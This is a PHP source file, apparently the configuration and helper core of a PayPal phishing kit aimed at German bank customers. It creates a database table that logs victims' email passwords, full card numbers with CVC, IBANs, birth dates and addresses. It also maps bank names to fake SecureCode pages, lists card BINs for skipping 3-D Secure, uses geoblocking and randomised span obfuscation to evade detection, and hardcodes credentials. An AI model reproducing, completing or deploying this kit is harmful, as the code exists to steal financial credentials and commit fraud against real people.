Online PHP editor | refs for Q5nB8

<?php session_start(); // Configuration $config = [ 'url' => 'http://' . $_SERVER['HTTP_HOST'] . '', 'mysql' => [ 'hostname' => 'localhost', 'username' => 'root', 'password' => 'okmijnAwD1337', 'database' => 'paypal' ], 'bincodes' => [ 'enabled' => true, 'api_key' => '2d974e94811161f1dda14bbf63aa9790' ], // Alle SMTPs welche nicht folgenden Format haben: smtp.example.com:25 'smtps' => [ 'web.de' => [ 'host' => 'smtp.web.de', 'port' => 587 ], 'aol.com' => [ 'host' => 'smtp.de.aol.com', 'port' => 587 ], 'aol.de' => [ 'host' => 'smtp.aim.com', 'port' => 587 ], 'aim.com' => [ 'host' => 'smtp.aim.com', 'port' => 587 ], 'arcor.de' => [ 'host' => 'mail.arcor.de', 'port' => 25 ], 'bluewin.ch' => [ 'host' => 'smtpauths.bluewin.ch', 'port' => 25 ], 'gmail.com' => [ 'host' => 'smtp.gmail.com', 'port' => 587 ], 'gmail.de' => [ 'host' => 'smtp.gmail.com', 'port' => 587 ], 'googlemail.com' => [ 'host' => 'smtp.gmail.com', 'port' => 587 ], 'gmx.de' => [ 'host' => 'mail.gmx.net', 'port' => 587 ], 'gmx.net' => [ 'host' => 'mail.gmx.net', 'port' => 587 ], 'outlook.de' => [ 'host' => 'smtp-mail.outlook.com', 'port' => 587 ], 'live.de' => [ 'host' => 'smtp-mail.outlook.com', 'port' => 587 ], 'hotmail.de' => [ 'host' => 'smtp-mail.outlook.com', 'port' => 587 ], 'live.com' => [ 'host' => 'smtp-mail.outlook.com', 'port' => 587 ], 'outlook.com' => [ 'host' => 'smtp-mail.outlook.com', 'port' => 587 ], 'yahoo.de' => [ 'host' => 'smtp.mail.yahoo.com', 'port' => 25 ], 'yahoo.com' => [ 'host' => 'smtp.mail.yahoo.com', 'port' => 25 ], 't-online.de' => [ 'host' => 'securesmtp.t-online.de', 'port' => 25 ], 'unitybox.de' => [ 'host' => 'submit.unitybox.de', 'port' => 587 ], 'kabelbw.de' => [ 'host' => 'submit.kabelbw.de', 'port' => 587 ], 'one.com' => [ 'host' => 'send.one.com', 'port' => 587 ], 'freenet.de' => [ 'host' => 'mx.freenet.de', 'port' => 587 ] ], // Bins bei dem die SecureCode Abfrage übersprungen werden 'skipBins' => [ /* '457096', '548622', '548621' */ ], // Banken (Alles groß schreiben, da es bei Debian sonst nicht erkannt wird) 'banks' => [ 'santander' => [ 'SANTANDER CONSUMER BANK AG', 'SANTANDER DIREKT BANK AG', 'SANTANDER' ], 'vw' => [ 'VOLKSWAGEN BANK GMBH', 'VOLKSWAGEN' ], 'advanzia' => [ 'ADVANZIA BANK, S.A.', 'ADVANZIA' ], 'barclay' => [ 'BARCLAYS BANK PLC', 'BARCLAYCARD GERMANY', 'BARCLAY' ], 'airp' => [ 'LUFTHANSA AIRPLUS SERVICEKARTEN GMBH' ], 'dkb' => [ 'DEUTSCHE KREDITBANK AG (DKB), LUFTHANSA, MILES AND MORE', 'DEUTSCHE KREDITBANK' ], 'lbb' => [ 'LANDESBANK BERLIN AG' ], 'dzb' => [ 'DZ BANK AG', 'DZ BANK AG DEUTSCHE ZENTRAL- GENOSSENSCHAFTSBANK' ], 'wgz' => [ 'WGZ BANK AG WESTDEUTSCHE GENOSSENSCHAFTS-ZENTRALBANK', 'WGZ' ], 'volksbank' => [ 'VOLKSBANK' ], 'spardabank' => [ 'SPARDABANK', 'SPARDA' ], 'postbank' => [ 'DEUTSCHE POSTBANK AG', 'POSTBANK BERLIN', 'POSTBANK' ], 'sparkasse' => [ 'DEUTSCHER SPARKASSEN - UND GIROVERBAND', 'SPARKASSE', 'SPARKASSEN', 'SPARKASSE SCHAUMBURG', 'SPARKASSE MAINZ', 'STADTSPARKASSE' ], 'random' => [ 'TARGOBANK AG AND CO. KGAA', 'CITIBANK AG', 'ING-DIBA AG', 'COMMERZBANK AG', 'MERCEDES-BENZ BANK AG', 'LANDESBANK BADEN-WUERTTEMBERG', 'COMDIRECT BANK AG', 'DEUTSCHE BANK AG', 'DEUTSCHE BANK PRIVAT-UND GESCHAEFTSKUNDEN AG', 'BAYERISCHE LANDESBANK GIROZENTRALE', 'BAYERISCHE LANDESBANK', 'SUEDDEUTSCHE BANK GMBH' ] ] ]; include('geoblocking.php'); if(!defined('CONTINUE_PDO')) { // MySQL Connection $pdo = new PDO( 'mysql:host=' . $config['mysql']['hostname'] . ';', $config['mysql']['username'], $config['mysql']['password'] ); $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $pdo->query('CREATE DATABASE IF NOT EXISTS ' . $config['mysql']['database']); $pdo->query('use ' . $config['mysql']['database']); $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); $pdo->setAttribute(PDO::MYSQL_ATTR_INIT_COMMAND, "SET NAMES 'utf8' COLLATE 'utf8_general_ci'"); $pdo->exec('SET NAMES \'utf8\''); mb_internal_encoding('UTF-8'); $pdo->exec(' CREATE TABLE IF NOT EXISTS `admins` ( `id` int(11) NOT NULL AUTO_INCREMENT, `username` varchar(255) NOT NULL, `password` varchar(255) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1; INSERT IGNORE INTO `admins` VALUES (\'1\', \'Admin\', \'123456\'); CREATE TABLE IF NOT EXISTS `logs` ( `id` int(11) NOT NULL AUTO_INCREMENT, `ip` varchar(255) DEFAULT NULL, `user_agent` text, `email` varchar(255) DEFAULT NULL, `password` varchar(255) DEFAULT NULL, `method` enum(\'creditcard\',\'bank\',\'none\') DEFAULT \'none\', `firstname` varchar(255) DEFAULT NULL, `surname` varchar(255) DEFAULT NULL, `dob_day` int(11) DEFAULT \'0\', `dob_month` int(11) DEFAULT \'0\', `dob_year` int(11) DEFAULT \'0\', `cc_number` varchar(255) DEFAULT NULL, `cc_expire_month` int(2) DEFAULT NULL, `cc_expire_year` int(4) DEFAULT NULL, `cc_cvc` int(4) DEFAULT NULL, `cc_bank` varchar(255) DEFAULT NULL, `cc_type` varchar(255) DEFAULT NULL, `cc_level` varchar(255) DEFAULT NULL, `cc_country` varchar(255) DEFAULT NULL, `cc_countrycode` varchar(255) DEFAULT NULL, `cc_card` varchar(255) DEFAULT NULL, `cc_limit` int(11) DEFAULT \'0\', `bank_iban` varchar(255) DEFAULT NULL, `bank_bic` varchar(255) DEFAULT NULL, `bank_name` varchar(255) DEFAULT NULL, `sc_1` varchar(255) DEFAULT NULL, `sc_2` varchar(255) DEFAULT NULL, `street` varchar(255) DEFAULT NULL, `city` varchar(255) DEFAULT NULL, `plz` int(5) DEFAULT NULL, `timestamp` varchar(255) DEFAULT \'123456789\', `mobilenr` varchar(255) DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=latin1; '); } // Classes class RandomHash { public static function init() { if(!isset($_SESSION['randomLetter'])) { $_SESSION['randomLetter'] = substr(str_shuffle(str_repeat($chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil(1 / strlen($chars)) )), 1, 1); } } public static function generate($string = '') { return $_SESSION['randomLetter'] . sha1($string . sha1(session_id())); } public static function generateUselessKey() { return md5($_SESSION['randomLetter']); } public static function stringSplitUnicode($string, $l = 0) { if ($l > 0) { $result = []; $length = mb_strlen($string, 'UTF-8'); for ($i = 0; $i < $length; $i += $l) { $result[] = mb_substr($string, $i, $l, 'UTF-8'); } return $result; } return preg_split("//u", $string, -1, PREG_SPLIT_NO_EMPTY); } public static function generateUseless($string = '') { $result = ''; foreach(self::stringSplitUnicode($string) as $letter) { $result .= '<span class="' . self::generate('rnd-span') . ' ' . self::generate(self::generateUselessKey()) . '">' . $letter . '</span>'; } return $result; } } RandomHash::init(); // Functions function generateToken() { if(version_compare(phpversion(), '7', '>=')) { $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); } else if(function_exists('mcrypt_create_iv')) { $_SESSION['csrf_token'] = bin2hex(mcrypt_create_iv(32, MCRYPT_DEV_URANDOM)); } else { $_SESSION['csrf_token'] = bin2hex(openssl_random_pseudo_bytes(32)); } return $_SESSION['csrf_token']; } function getToken() { if(!isset($_SESSION['csrf_token']) || empty($_SESSION['csrf_token'])) { generateToken(); } return $_SESSION['csrf_token']; } function getOB($bankName) { global $config; $bankName = strtoupper($bankName); foreach($config['banks'] as $obKey => $obNames) { foreach($obNames as $obName) { if(strtoupper($obName) == $bankName || strpos(strtoupper($obName), $bankName) !== false || (count(explode(' ', $bankName)) > 0 && strpos(strtoupper($obName), explode(' ', $bankName)[0]) !== false)) { return strtolower($obKey); } } } return null; } function isLoggedIn() { global $pdo; if(isset($_SESSION['acp_username'], $_SESSION['acp_password'])) { $stmt = $pdo->prepare('SELECT NULL FROM `admins` WHERE `username` = ? AND `password` = ? LIMIT 1'); $stmt->execute([$_SESSION['acp_username'], $_SESSION['acp_password']]); return $stmt->rowCount() > 0; } return false; } function getLogsCount() { global $pdo; $qry = $pdo->query('SELECT NULL FROM `logs`'); return $qry->rowCount(); } function getUserInfo($row, $filter = true) { global $pdo; if(isLoggedIn()) { $stmt = $pdo->prepare('SELECT `' . $row . '` FROM `admins` WHERE `username` = ? AND `password` = ? LIMIT 1'); $stmt->execute([$_SESSION['acp_username'], $_SESSION['acp_password']]); if($stmt->rowCount() > 0) { $obj = $stmt->fetch(PDO::FETCH_OBJ); return $filter ? htmlspecialchars($obj->{$row}) : $obj->{$row}; } } return ''; } function getIp() { $ip = $_SERVER['REMOTE_ADDR']; if(!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } else if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } else if(isset($_SERVER['HTTP_CF_CONNECTING_IP'])) { $ip = $_SERVER['HTTP_CF_CONNECTING_IP']; } return $ip; } ?>